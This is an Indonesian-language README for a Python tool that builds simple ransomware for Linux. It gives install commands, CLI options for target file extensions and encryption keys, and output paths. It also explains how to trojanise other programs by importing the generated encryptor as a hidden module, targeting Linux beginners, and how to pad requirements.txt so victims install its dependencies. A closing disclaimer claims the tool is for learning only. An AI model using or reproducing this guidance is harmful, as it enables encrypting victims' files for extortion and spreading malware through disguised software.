Program ini merupakan alat untuk membangun Malware dengan bahasa pemrograman Python, saya mengkhususkan target Malware ini hanya untuk Sistem Operasi berbasis Linux. Untuk saat ini alat ini hanya dapat digunakan untuk membuat sebuah Ransomware sederhana. Selain itu perlu dicatat bahwa ini hanyalah program sederhana dan hasil yang didapat pun sederhana, tapi cukup berguna jika anda masih pemula di dunia Pyton dan ingin mempelajari lebih banyak tentang Python (dengan mempelajari kode sumber alat ini ataupun sesuatu yang dihasilkan dengan alat ini).
Saya menargetkan hasil akhir yang digenerasi oleh alat ini untuk berjalan di Sistem Operasi berbasis Linux, semata-mata hanya untuk tujuan percobaan dan pembelajaran, meskipun hasil yang digenerasi "mungkin" bisa saja berjalan di Sistem Operasi lain. Alasan saya mengkhususkan Sistem Operasi berbasis Linux dikarenakan adanya mindset masyarakat bahwa Sistem Operasi Linux benar-benar aman. Meskipun pada kenyataannya memang relatif lebih aman daripada Sistem Operasi yang umum digunakan masyarakat, namun tidak menutup kemungkinan bahwa Sistem Operasi berbasis Linux juga bisa terinfeksi perangkat lunak berbahaya. Salah satu alasan mengapa Sistem Operasi berbasis Linux relatif lebih aman dan jarang terkena virus adalah karena sangat jarang virus yang dibuat untuknya. Pembuat virus pada umumnya lebih menargetkan virus buatannya untuk berjalan di Sistem Operasi berbayar khususnya sumber tertutup.
Segala hal berkaitan dengan program ini bukan tanggung jawab pengembang, saya selaku pengembang tidak bertanggung jawab jika program ini digunakan untuk tujuan kejahatan ataupun hal-hal yang illegal dan melanggar undang-undang. Saya membuat program ini semata-mata hanya untuk tujuan pembelajaran, dan atau bukan untuk mengajak orang-orang kepada kegiatan yang mengarah kepada tindak kejahatan, pembajakan, perusakan, ataupun hal lainnya yang bersifat merugikan dan melanggar undang-undang.
Anda cukup memasukkan beberapa parameter didalam prompt yang diberikan alat ini lewat antarmuka baris perintah, maka akan dihasilkan sebuah Ransomware dalam bentuk berkas Python byte-compiled. Anda juga bisa memilih untuk menyimpan kode sumber dari berkas Python byte-compiled yang digenerasi.
- Python3.*
- Git
- argparse
- base64
- hashlib
- os
- py_compile
- re
- shutil
- sys
- threading
- cryptography
- termcolor
Pertama, buka terminal anda kemudian ikuti instruksi berikut.
sudo apt update
sudo apt install git python3
git clone https://github.com/ipansubastian/py-malware-builder
cd py-malware-builder
pip3 install -r requirements.txtpacman -Sy
pacman -S git python3
git clone https://github.com/ipansubastian/py-malware-builder
cd py-malware-builder
pip3 install -r requirements.txtchmod +x main.py
./main.py --helpUntuk membuat Ransomware anda bisa mengetikan perintah berikut.
./main.py create --type ransomware
Isi prompt yang ada sesuai dengan parameter yang anda inginkan. Untuk penjelasan lebih lengkap silakan lihat dokumentasi.
-
Ranwomware Name Nama Ransomware, nama harus sesuai dengan standar identifier. Contoh: nama hanya boleh mengandung abjad, angka, dan garis bawah. Karakter prtama hanya boleh abjad atau garis bawah.
-
Secret Key Karakter yang akan disisipkan kedalam file terenkripsi, semakin acak karakter semakin bagus. Jika dibiarkan kosong, maka secret key dianggap tidak diatur.
-
Ekstensi File Terenkripsi Ekstensi dari file yang terenkripsi oleh Ransomware yang digenerasi. Misalkan ekstensi diatur menjadi "mern". Jika file awal bernama "test.pdf" maka nama setelah dienkripsi akan menjadi "test.pdf.mern"
-
Ekstensi Target Kumpulan dari ekstensi berkas yang ingin dienkripsi, setiap ekstensi dipisahkan dengan tanda koma (,). Misalkan anda ingin mengenkripsi berkas-berkas yang memiliki ekstensi (pdf, docs, dan xls), maka anda cukup memasukkan "pdf,docs,xls" di dalam prompt. Jika anda melewati prompt dan tidak memasukkan apapun, maka semua jenis berkas akan dienkripsi.
-
Secara default berkas yang akan dienkripsi hanya berkas yang berada di direktori ./TEST_RW, ini untuk keamanan keperluan pengujian. Anda bisa merubah isi variable di berkas Ransomware.py baris ke 449 untuk mengubahnya.
-
Perlu diperhatikan bahwa jika anda menggunakan berkas Python byte-compiled yang digenerasi oleh program ini, berkas tersebut hanya akan berjalan di interpreter dengan versi yang sama dengan interpreter yang digunakan untuk menjalankan alat ini. Untuk mengatasi hal ini anda dapat menggunakan kode sumber daripada berkas yang sudah terkompilasi, sebagai gantinya target bisa melihat kode anda jika memang mereka orang-orang yang cukup teliti dan perfeksionis.
Q: Dimanakah lokasi berkas yang telah dibuat? A: Anda bisa menemukannya di path build/files/nama-ransomware. Didalam direktori tersebut terdapat dua buah berkas "nama-ransomware_e_lib.pyc" sebagai enkriptor dan "nama-ransomware_d_lib.pyc" sebagai dekriptor. Jika anda memilih opsi untuk menyimpan kode sumber akan ada dua bekas tambahan. Berkas pertama bernama "nama-ransomware_e_lib.py" sebagai kode sumber dari berkas enkriptor dan "nama-ransomware_d_lib.py" sebagai kode sumber dari berkas dekriptor.
Q: Dimana lokasi kunci enkripsi / dekripsi dari berkas Ransomware yang telah dibuat? A: Lokasi kunci berada di path keys/nama-ransomware.sec
Q: Apakah saya bisa mengatur kunci enkripsi sendii tanpa digenerasi otomatis? A: Untuk saat ini fitur tersebut belum tersedia.
Anda bisa menyisipkan berkas nama-ransomware_e_lib.pyc kedalam sebuah program lain sebagai modul, kemudian mengimportnya.
Sebagai contoh saya mempunyai program x yang memiliki suatu fungsi yang "wah" dan dibutuhkan oleh orang lain, anggap saja target saya pemula Linux yang belum mengetahui seluk beluk dunia komputer, khususnya bahasa pemrograman.
Di dalam berkas utama program tersebut saya bisa mengimport ransomware tersebut sebagai modul. Ketika target mengeksekusi program tersebut maka ransomware akan berjalan.
Sebelumnya, pastikan bahwa di perangkat target sudah terpasang ketergantungan yang dibutuhkan. Tambahkan beberapa modul berikut kedalam berkas requirements.txt agar ketergantungan terpenuhi saat target menginstall modul yang dibutuhkan oleh program inang dengan berkas requirements.txt tersebut: (cryptography, hashlib, base64, dan threading).
Untuk program yang membutuhkan akses superuser maka ransomware akan bekerja untuk mengenkripsi berkas-berkas milik root, jika tidak maka ransomware akan melewatinya dan hanya mengenkripsi berkas yang hanya diizinkan untuk diubah pengguna reguler. (Perlu diingat jika anda melakukan ini, resiko diluar tanggung jawab pengembang).
Untuk Kontributor, atau informasi terkait kontribusi lihat: CONTRIBUTION.md